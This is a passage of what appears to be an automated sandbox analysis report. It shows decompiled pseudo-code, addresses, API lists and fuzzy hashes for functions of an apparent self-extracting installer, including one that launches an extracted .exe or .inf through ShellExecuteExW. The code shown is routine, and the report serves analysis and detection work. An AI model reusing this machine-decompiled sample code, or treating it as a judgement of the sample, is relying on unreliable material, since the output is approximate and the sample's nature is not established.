				_t45 = GetDlgItem( *0x2a75c8, 0x68);
				_t48 =  *0x2a75d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0x2a75e8; // 0x0
					E00278569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0x2922e4);
					 *0x2a75d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}

0x0027c197
0x0027c1b2
0x0027c1b9
0x0027c1bf
0x0027c1c1
0x0027c1c7
0x0027c1cf
0x0027c1de
0x0027c1e8
0x0027c1ea
0x0027c1ea
0x0027c1fe
0x0027c204
0x0027c214
0x0027c218
0x0027c21c
0x0027c221
0x0027c227
0x0027c232
0x0027c23c
0x0027c244
0x0027c244
0x0027c254
0x0027c25e
0x0027c26d
0x0027c271
0x0027c27f
0x0027c290
0x0027c290
0x0027c2a4

APIs

Part of subcall function 0027A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0027A399
Part of subcall function 0027A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0027A3AA
Part of subcall function 0027A388: IsDialogMessageW.USER32(0002032C,?), ref: 0027A3BE
Part of subcall function 0027A388: TranslateMessage.USER32(?), ref: 0027A3CC
Part of subcall function 0027A388: DispatchMessageW.USER32(?), ref: 0027A3D6

GetDlgItem.USER32(00000068,002BDE38), ref: 0027C1A4
ShowWindow.USER32(00000000,00000005), ref: 0027C1CF
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0027C1DE
SendMessageW.USER32(00000000,000000C2,00000000,002922E4), ref: 0027C1E8
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0027C1FE
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0027C214
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0027C254
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0027C25E
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0027C26D
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0027C290
SendMessageW.USER32(00000000,000000C2,00000000,0029304C), ref: 0027C29B

Strings

\, xrefs: 0027C204

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 15e68322c7ef5ef0ef5f24e8d3c98b974dd232ad0af36df2d0eb0b23401362dd
Instruction ID: d1e2d483867d585262d8e657a98257561bea3349f3d9e5dc9e56f738f82642a8
Opcode Fuzzy Hash: 15e68322c7ef5ef0ef5f24e8d3c98b974dd232ad0af36df2d0eb0b23401362dd
Instruction Fuzzy Hash: A72148712453047BE311EF249C45FAF7B9CEF82754F400619FA50961D1CBA55A088ABB

Uniqueness

Uniqueness Score: -1.00%

Function 0027C431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0027C431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E0027D940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00282B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E0027E920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0x2aa602 != _t77) {
								_a24 = 0x2aa602;
							}
						}
						_a32 = 1;
						_t93 = E0026B153(_t87);
						if(_t93 != 0 && E00271410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00269E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E0026AED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0x2a85f8 != _t77 || _a4168 != _t77 ||  *0x2bde21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0x29df24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0x29df20(_a56, 0x7d0);
								E0027C8F0(_a48);
								if( *0x2bde21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0x2bde24) {
										 *0x2bde24 = _t68;
									}
									 *0x2bde22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E00271410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0x2a85f8 != 0 && _t54 == 0 &&  *0x2bde21 == _t54) {
									 *0x2bde28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}

0x0027c431
0x0027c436
0x0027c43d
0x0027c444
0x0027c449
0x0027c695
0x0027c69d
0x0027c69d
0x0027c450
0x0027c45b
0x00000000
0x0027c461
0x0027c464
0x0027c46c
0x0027c471
0x0027c478
0x0027c47b
0x0027c47f
0x0027c489
0x0027c48b
0x0027c48b
0x0027c493
0x0027c496
0x0027c49c
0x0027c4a0
0x0027c4a2
0x0027c4a2
0x0027c4a4
0x0027c4a8
0x0027c4ad
0x0027c4e5
0x0027c4e5
0x0027c4e9
0x0027c4eb
0x0027c4f4
0x0027c4ff
0x0027c4ff
0x0027c4f4
0x0027c508
0x0027c515
0x0027c519
0x0027c52a
0x0027c52a
0x0027c53d
0x0027c53f
0x0027c548
0x0027c549
0x0027c54d
0x0027c556
0x0027c556
0x0027c55f
0x0027c567
0x0027c56d
0x0027c580
0x0027c595
0x0027c597
0x0027c5a0
0x0027c5a4
0x0027c5a6
0x0027c5a6
0x0027c5a0
0x0027c5b1
0x0027c5bb
0x0027c5c7
0x0027c5e6
0x0027c5f0
0x0027c5f2
0x0027c5f2
0x0027c5f7
0x0027c5f7
0x0027c5c7
0x0027c602
0x0027c60a
0x0027c622
0x0027c629
0x0027c637
0x0027c637
0x0027c67f
0x0027c67f
0x0027c67f
0x0027c688
0x0027c691
0x0027c691
0x0027c688
0x00000000
0x0027c694
0x0027c4af
0x0027c4b1
0x0027c4b9
0x0027c4bc
0x0027c649
0x0027c649
0x0027c64e
0x00000000
0x00000000
0x0027c647
0x0027c655
0x0027c659
0x0027c4c6
0x0027c4ca
0x0027c66a
0x0027c66e
0x0027c66e
0x0027c673
0x0027c676
0x00000000
0x00000000
0x00000000
0x00000000
0x0027c4ca
0x0027c647
0x0027c650
0x0027c4c2
0x00000000
0x0027c4dc
0x0027c4dc
0x0027c4dd
0x0027c4e0
0x00000000
0x0027c4b9

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 0027C55F
ShowWindow.USER32(?,00000000), ref: 0027C5A4
GetExitCodeProcess.KERNEL32(?,?), ref: 0027C5DC
CloseHandle.KERNEL32(?), ref: 0027C602
ShowWindow.USER32(?,00000001), ref: 0027C691

Part of subcall function 00271410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0026ACFE,?,?,?,0026ACAD,?,-00000002,?,00000000,?), ref: 00271426

Strings

.exe, xrefs: 0027C60C
, xrefs: 0027C4B1
.inf, xrefs: 0027C51B

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 1151bc53a2ebe8af7326c62b03e08f8c763624821af2cd847d81ef4db6b03dda
Instruction ID: 4e4043b2003866eab8cc2d1e86d92c72dfb844bed39c99ecadc480e1d1687d8d
Opcode Fuzzy Hash: 1151bc53a2ebe8af7326c62b03e08f8c763624821af2cd847d81ef4db6b03dda
Instruction Fuzzy Hash: A95126704243829BD7319F30E854BBBB7E8EF85304F64881DE5C9A7150E7B1D9A8CB52

Uniqueness

Uniqueness Score: -1.00%

Function 002895A5, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E002895A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x29d668; // 0xd26a0a57
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E0028DBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0027E203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E0028980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E00289C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E0028980D(_t100);
									goto L36;
								}
								_t61 = E00289C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E0028980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E00287A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E00290EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E00289C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E00287A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00290EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}

0x002895aa
0x002895ab
0x002895ac
0x002895b3
0x002895b7
0x002895b8
0x002895be
0x002895c4
0x002895ca
0x002895cd
0x002895cd
0x002895d0
0x002895d2
0x002895d2
0x002895d0
0x002895d4
0x002895d9
0x002895e0
0x002895e3
0x002895e3
0x002895ff
0x00289605
0x0028960a
0x0028979d
0x002897b0
0x00289610
0x00289610
0x00289613
0x00289618
0x0028961c
0x00289670
0x00289670
0x00289672
0x00289674
0x00289792
0x00289792
0x00289794
0x00289795
0x0028979b
0x00000000
0x0028979b
0x00289685
0x0028968b
0x0028968d
0x00000000
0x00000000
0x00289693
0x002896a5
0x002896aa
0x002896ae
0x00000000
0x00000000
0x002896bb
0x002896f5
0x002896f8
0x002896fb
0x002896fd
0x002896ff
0x00289701
0x0028974d
0x0028974d
0x0028974f
0x0028974f
0x00289751
0x0028978b
0x0028978c
0x00000000
0x00289791
0x00289765
0x0028976a
0x0028976c
0x00000000
0x00000000
0x00289770
0x00289771
0x00289772
0x00289775
0x002897b1
0x002897b4
0x00289777
0x00289777
0x00289778
0x00289778
0x00289785
0x00289787
0x00289789
0x002897ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00289789
0x00289703
0x00289706
0x00289708
0x0028970a
0x0028970c
0x0028970f
0x00289714
0x0028972f
0x00289731
0x0028973b
0x0028973d
0x0028973e
0x00289740
0x00000000
0x00000000
0x00289742
0x00289748
0x00289748
0x00000000
0x00289748
0x00289716
0x00289718
0x0028971c
0x00289721
0x00289723
0x00289725
0x00000000
0x00000000
0x00289727
0x00000000
0x00289727
0x002896bd
0x002896c2
0x00000000
0x00000000
0x002896c8
0x002896ca
0x00000000
0x00000000
0x002896e6
0x002896ea
0x00000000
0x00000000
0x00000000
0x002896f0
0x00289623
0x00289625
0x00289627
0x0028962f
0x0028964e
0x00289650
0x0028965a
0x0028965c
0x0028965d
0x0028965f
0x00000000
0x00000000
0x00289665
0x0028966b
0x0028966b
0x00000000
0x0028966b
0x00289633
0x00289637
0x0028963c
0x00289640
0x00000000
0x00000000
0x00289646
0x00000000
0x00289646

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0028451B,0028451B,?,?,?,002897F6,00000001,00000001,31E85006), ref: 002895FF
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002897F6,00000001,00000001,31E85006,?,?,?), ref: 00289685
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0028977F
__freea.LIBCMT ref: 0028978C

Part of subcall function 00287A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00282FA6,?,0000015D,?,?,?,?,00284482,000000FF,00000000,?,?), ref: 00287ABC

__freea.LIBCMT ref: 00289795
__freea.LIBCMT ref: 002897BA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bd9cd58789a3993f1b30a40cca4f27bdd8e4ed21d53517ca2b78e498a962a108
Instruction ID: 310b9c4ee781a3bd92e977ec46ef727aaced7a70db22550cfa2b9d63f64e5eb5
Opcode Fuzzy Hash: bd9cd58789a3993f1b30a40cca4f27bdd8e4ed21d53517ca2b78e498a962a108
Instruction Fuzzy Hash: 9551E7B6631216AFDB25AF64CC81EBAB7A9DB44750F194629FC04D61C1EB34DCA0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00269768, Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00269768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E0027D940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00266EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E0026FAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0026B32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x00269768
0x0026976d
0x00269773
0x0026977c
0x0026977e
0x00269789
0x00269794
0x00269790
0x00269790
0x00269790
0x0026979a
0x002697a2
0x002697aa
0x002697b3
0x002697b5
0x002697b5
0x002697c0
0x002697c5
0x002697c7
0x002697c7
0x002697dc
0x002697e0
0x002697e9
0x002697eb
0x002697eb
0x00269804
0x0026980a
0x0026980f
0x00269873
0x00269878
0x0026987f
0x00269888
0x00269893
0x00269893
0x0026989e
0x002698a1
0x002698a4
0x002698a7
0x002698ad
0x002698be
0x002698c2
0x002698c2
0x002698d2
0x00269811
0x00269817
0x00269833
0x00269862
0x00269867
0x00269869
0x00269869
0x00000000
0x00269867
0x0026984c
0x0026984e
0x00269857
0x00269859
0x00269859
0x00269860
0x00000000
0x00000000
0x00000000
0x00000000
0x00269860

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000), ref: 00269804
GetLastError.KERNEL32(?,?,002676F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00269811
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000), ref: 00269846
GetLastError.KERNEL32(?,?,002676F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0026984E
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002676F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00269893

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 7b7b83c5f8ad522373bc9f4a28097e30811a1525c3636d2c99eac63898659853
Instruction ID: 7b7e655097895c67dc5c4fa935f71a9de397301334f3400d88cdcf552372e197
Opcode Fuzzy Hash: 7b7b83c5f8ad522373bc9f4a28097e30811a1525c3636d2c99eac63898659853
Instruction Fuzzy Hash: D8412871464746AFE3219F24DC09BDABBE8EB01324F10071AF9A0971D0DB75A8EDCB91

Uniqueness

Uniqueness Score: -1.00%

Function 0027A388, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027A388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x2a75c8; // 0x2032c
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						return DispatchMessageW( &_v32);
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x0027a399
0x0027a3a1
0x0027a3aa
0x0027a3b0
0x0027a3b7
0x0027a3c8
0x0027a3cc
0x00000000
0x0027a3d6
0x0027a3be
0x0027a3c6
0x00000000
0x00000000
0x0027a3c6
0x0027a3e0

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0027A399
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0027A3AA
IsDialogMessageW.USER32(0002032C,?), ref: 0027A3BE
TranslateMessage.USER32(?), ref: 0027A3CC
DispatchMessageW.USER32(?), ref: 0027A3D6

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: b1ebdb59783a5d71766e1b9613ede52cf465a4753c2536ecf25410014bb041d2
Instruction ID: da882ac4a52da42f9a0f6f66a538c3d86520aa8daf23889c4271ce6d5c14095a
Opcode Fuzzy Hash: b1ebdb59783a5d71766e1b9613ede52cf465a4753c2536ecf25410014bb041d2
Instruction Fuzzy Hash: B9F0F47291122AAB8B20AFA2AC4DDEF7F6CEE063617404056F80ED2400EA689505DAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00279A32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00279A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00271410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00279a42
0x00279a49
0x00279a51
0x00279a54
0x00279a61
0x00279a68
0x00279a70
0x00279a76
0x00279a76
0x00279a78
0x00279a7b
0x00279a80
0x00000000
0x00279a80
0x00279a8a

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00279A49
SHAutoComplete.SHLWAPI(?,00000010), ref: 00279A80

Part of subcall function 00271410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0026ACFE,?,?,?,0026ACAD,?,-00000002,?,00000000,?), ref: 00271426

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00279A70

Strings

EDIT, xrefs: 00279A54, 00279A5F, 00279A6C

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

